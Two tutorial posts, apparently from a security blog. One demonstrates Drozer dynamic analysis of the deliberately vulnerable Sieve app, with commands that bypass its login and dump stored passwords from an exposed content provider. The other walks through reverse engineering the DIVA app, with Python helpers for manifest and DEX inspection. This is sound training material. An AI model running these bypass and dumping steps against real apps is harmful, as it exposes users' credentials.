Quick Demo on Performing Dynamic Analysis for Android App

Drozer is a comprehensive security audit and attack framework for Android, which makes it well suited to performing dynamic analysis on Android apps.

Two prerequisites for performing this quick demo:

  • Kali Linux
  • A rooted Android device (an Android Virtual Device (AVD) would also work, but a physical Android device is used in this demo)

Installing the Drozer Console on Kali

  1. (Skip this step if adb is already installed) Install the ADB tool

    sudo apt-get install android-tools-adb

  2. Install Drozer’s dependencies

    wget https://pypi.python.org/packages/25/5d/cc55d39ac39383dd6e04ae80501b9af3cc455be64740ad68a4e12ec81b00/setuptools-0.6c11-py2.7.egg#md5=fe1f997bc722265116870bc7919059ea

    (If you can’t use wget to fetch the file, download “setuptools-0.6c11-py2.7.egg” from https://pypi.python.org/pypi/setuptools/0.6c11 with a browser instead)

    sh setuptools-0.6c11-py2.7.egg

    easy_install --allow-hosts pypi.python.org protobuf

    easy_install twisted==10.2.0

  3. Install Drozer

    wget https://github.com/mwrlabs/drozer/releases/download/2.4.2/drozer-2.4.2-py2.7.egg

    easy_install ./drozer-2.4.2-py2.7.egg

  4. Test the installation

    drozer

    If the drozer command runs and prints its usage, the console installation succeeded.

Installing the Drozer Agent onto the rooted Android device

  1. Make sure your rooted Android device has “Developer options” enabled with the following settings:
    Root access: Apps and ADB
    Android debugging: On
    ADB over network: On (ADB over USB could be used as well, but in some situations an Android device’s vendor ID is not recognized by the ADB tool; ADB over network avoids this kind of connection issue.)
  2. In Kali Linux, make an ADB connection to the rooted Android device

    adb connect 192.168.137.219

    While the ADB connection is being established, authorize it on your rooted Android device

    Verify the ADB connection afterwards

    adb devices

  3. Deploy the Drozer agent to the rooted Android device

    adb install agent.apk

Establish a Drozer Session

  1. In Kali, forward a local port to the TCP socket opened by the Drozer Agent

    adb forward tcp:31415 tcp:31415

  2. Launch the Drozer agent on the rooted Android device, select the “Embedded Server” option and tap “Enable” to start the server
  3. Connect the console to the agent

    drozer console connect

Basic Usage Demo

  1. (Skip this step if the target app is already in place) Install a dummy app named “Sieve” (a password manager), which showcases some common Android vulnerabilities

    wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk

    adb install sieve.apk

    Open the newly installed “Sieve” and enter some dummy information for testing.

  2. Find the identifier for “Sieve”

    run app.package.list -f sieve

  3. Check the basic package information about “Sieve”

    run app.package.info -a com.mwr.example.sieve

  4. Identify the Attack Surface of “Sieve”

    run app.package.attacksurface com.mwr.example.sieve

    The attack surface consists of the interfaces that are accessible (i.e. exported) to other apps:
    activities -> screens used by the app
    content providers -> database objects of the app
    services -> background tasks (in addition, the service of “Sieve” is debuggable, which means that a debugger could be attached to the process)

  5. Gather more information on activities

    run app.activity.info -a com.mwr.example.sieve

    Since the activity is exported and does not require any permission, let’s try to launch the activity “com.mwr.example.sieve.PWList”

    run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

    The authentication of “Sieve” has been successfully bypassed!

  6. Gather more information on content providers (i.e. database objects)

    run app.provider.info -a com.mwr.example.sieve

    This confirms that these content providers do not require any particular permission to interact with them, except for the path “/Keys” in the “DBContentProvider”.

    As the content provider is named “DBContentProvider”, some form of database is likely located behind it. The URIs used to access the DBContentProvider need to be identified.

    run scanner.provider.finduris -a com.mwr.example.sieve

    Let’s retrieve information from those accessible URIs.

    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

    A list of usernames, passwords (Base64-encoded) and emails from “Sieve” can be retrieved.
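As an added example (not Drozer’s own code), the following Python script reproduces offline what step 4’s attack-surface listing and step 6’s provider permission check report, by parsing a decoded AndroidManifest.xml such as apktool produces. The sample manifest embedded in it is constructed for the demo, not Sieve’s real manifest.

```python
"""Offline attack-surface audit of a decoded AndroidManifest.xml (added example,
not Drozer's code). It reproduces the logic behind `run app.package.attacksurface`:
exported activities, providers and services, plus the debuggable flag.
SAMPLE_MANIFEST is a constructed sample modelled on the Sieve findings above."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sample">
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity" android:exported="false"/>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".Settings">
      <intent-filter><action android:name="android.intent.action.VIEW"/></intent-filter>
    </activity>
    <provider android:name=".DBContentProvider" android:exported="true">
      <path-permission android:path="/Keys" android:readPermission="com.example.sample.READ_KEYS"/>
    </provider>
    <service android:name=".AuthService" android:exported="true"
             android:permission="com.example.sample.USE_AUTH"/>
  </application>
</manifest>"""

def attr(el, name):
    """Read an attribute from the android: namespace."""
    return el.get("{%s}%s" % (ANDROID_NS, name))

def is_exported(el):
    """An explicit android:exported wins; otherwise a component that declares
    an intent-filter is implicitly exported (the classic manifest mistake)."""
    explicit = attr(el, "exported")
    if explicit is not None:
        return explicit == "true"
    return el.find("intent-filter") is not None

def attack_surface(manifest_xml):
    """Return exported components by type, each with the permission guarding it
    (None means any app can reach it) and any path-permission protected paths."""
    app = ET.fromstring(manifest_xml).find("application")
    result = {"debuggable": attr(app, "debuggable") == "true", "activity": [], "provider": [], "service": []}
    for kind in ("activity", "provider", "service"):
        for el in app.findall(kind):
            if is_exported(el):
                result[kind].append({
                    "name": attr(el, "name"),
                    "permission": attr(el, "permission"),
                    "protected_paths": [attr(p, "path") for p in el.findall("path-permission")],
                })
    return result
```

Run it against the output of `apktool d` on the target APK to get the same picture as the Drozer console, with the added detail of which paths a provider protects and which it leaves open.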

Conclusion

  • Drozer is user friendly and makes it easy to identify potential vulnerabilities in Android apps
  • This demo only covers part of Drozer’s features; please explore more on your own. You could even write your own Drozer module to perform your own checks

Thanks for reading!

Best regards
Henry

Quick Demo on Reverse Engineering Android App

For this demo, the debug version of DIVA (Damn Insecure and Vulnerable App) is used as the target Android app and Kali Linux is used as the tooling platform.

Download the debug version of DIVA

  1. Visit the DIVA download page and go to the section “Where can I get Diva?”
  2. Copy the download link and download the file with wget.

    wget http://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz

    Then extract “diva-beta.tar.gz”

    tar xvzf diva-beta.tar.gz

What is APK?

  1. Android Package Kit (APK) is the package file format used by the Android operating system for distributing and installing mobile apps and middleware. It is an archive file in zip format.
  2. However, the contained files cannot simply be unzipped to obtain their original forms.
  3. classes.dex holds the Dalvik bytecode of the APK (Dalvik is the virtual machine in Google’s Android operating system). dex2jar can convert Dalvik bytecode (DEX) to Java bytecode (JAR), and JD-GUI can display the decompiled Java source code in a friendly GUI.
  4. apktool can decode the resources (e.g. XML files) within an APK file to nearly their original forms.
    However, for ease of reverse engineering (decompiling/editing) and recompiling Android application binaries within a single user interface, APK Studio will be used. It is a cross-platform IDE with a friendly IDE-like layout and a code editor that supports syntax highlighting for Android SMALI (*.smali) code files.
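The following Python script is an added example, not from the original post or from dex2jar/apktool: it treats the APK as the zip archive it is, pulls out classes.dex and parses the DEX header to check the file’s checksum and signature and to read the table counts. It constructs a header-only DEX and a two-entry APK itself, so it runs without the real diva-beta.apk.

```python
"""Inspect an APK as the zip it is and validate its classes.dex header (added example,
not from the original post or from dex2jar/apktool). Header fields follow the public
Dalvik Executable format; build_sample_dex() constructs a minimal header-only DEX
so the code runs offline without a real APK."""
import hashlib, io, struct, zipfile, zlib

DEX_HEADER_SIZE = 0x70

def parse_dex_header(dex):
    """Parse the 0x70-byte header; table counts sit at 0x38.. as (size, offset) pairs."""
    if len(dex) < DEX_HEADER_SIZE or dex[:4] != b"dex\n":
        raise ValueError("not a DEX file")
    checksum, = struct.unpack_from("<I", dex, 8)
    sizes = struct.unpack_from("<12I", dex, 0x38)
    return {
        "version": dex[4:7].decode("ascii"),          # "035", "037", ...
        "file_size": struct.unpack_from("<I", dex, 0x20)[0],
        # adler32 covers everything after magic+checksum; SHA-1 everything after the signature.
        "checksum_ok": checksum == zlib.adler32(dex[12:]) & 0xFFFFFFFF,
        "signature_ok": dex[12:32] == hashlib.sha1(dex[32:]).digest(),
        "string_ids": sizes[0], "type_ids": sizes[2], "proto_ids": sizes[4],
        "field_ids": sizes[6], "method_ids": sizes[8], "class_defs": sizes[10],
    }

def inspect_apk(apk):
    """apk is a path, a file-like object or the raw archive bytes; returns the
    zip entry names and the parsed classes.dex header."""
    src = io.BytesIO(apk) if isinstance(apk, (bytes, bytearray)) else apk
    with zipfile.ZipFile(src) as zf:
        return {"entries": zf.namelist(), "dex": parse_dex_header(zf.read("classes.dex"))}

def build_sample_dex(class_defs=3):
    """Constructed header-only DEX with a valid checksum and signature (test data)."""
    body = struct.pack("<III", DEX_HEADER_SIZE, DEX_HEADER_SIZE, 0x12345678)  # file_size, header_size, endian_tag
    body += struct.pack("<III", 0, 0, 0)                                      # link_size, link_off, map_off
    counts = [0] * 12
    counts[10] = class_defs                                                   # class_defs_size
    body += struct.pack("<12I", *counts) + struct.pack("<II", 0, 0)          # ... data_size, data_off
    signature = hashlib.sha1(body).digest()
    checksum = zlib.adler32(signature + body) & 0xFFFFFFFF
    return b"dex\n035\x00" + struct.pack("<I", checksum) + signature + body

def build_sample_apk(dex):
    """Constructed two-entry APK (zip) holding the given classes.dex."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<binary AXML placeholder>")
        zf.writestr("classes.dex", dex)
    return buf.getvalue()
```

Calling `inspect_apk("diva-beta.apk")` on the real file lists its zip entries and, for classes.dex, tells you whether the checksum and signature still match, which is the first thing to re-check after recompiling an edited APK.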

Convert the APK into Java source code for detailed review

  1. Extract the classes.dex from APK

    unzip diva-beta.apk classes.dex

  2. Convert Dalvik Bytecode (DEX) into Java Bytecode (JAR)

    d2j-dex2jar classes.dex

  3. (Skip this step if JD-GUI is already installed) Download the JD-GUI installation package and install it

    wget https://github.com/java-decompiler/jd-gui/releases/download/v1.4.0/jd-gui_1.4.0-0_all.deb

    dpkg -i jd-gui_1.4.0-0_all.deb

  4. Open classes-dex2jar.jar with JD-GUI

    java -jar /opt/jd-gui/jd-gui.jar /root/classes-dex2jar.jar

Decode APK resources and edit SMALI code (decompile -> edit -> recompile)

  1. (Skip this step if APK Studio is already installed)
    Install android adb

    sudo apt-get install android-tools-adb

    Download the APK Studio installer from the APK Studio official website
    Make the downloaded installer “apkstudio-d49d3de-linux.run” executable and run it

    chmod +x apkstudio-d49d3de-linux.run

    ./apkstudio-d49d3de-linux.run

  2. Open APK Studio and open the APK file

    /opt/apkstudio/apkstudio

  3. Review and edit the XML and SMALI code
    (Signing and exporting the APK will not be discussed here; that should be simple.)

Conclusion

  • The converted Java source code is good for understanding the detailed program structure (assuming code obfuscation is not implemented)
  • SMALI code is good for quick edits (with reference to the Java source code)

Thanks for reading!

Best regards
Henry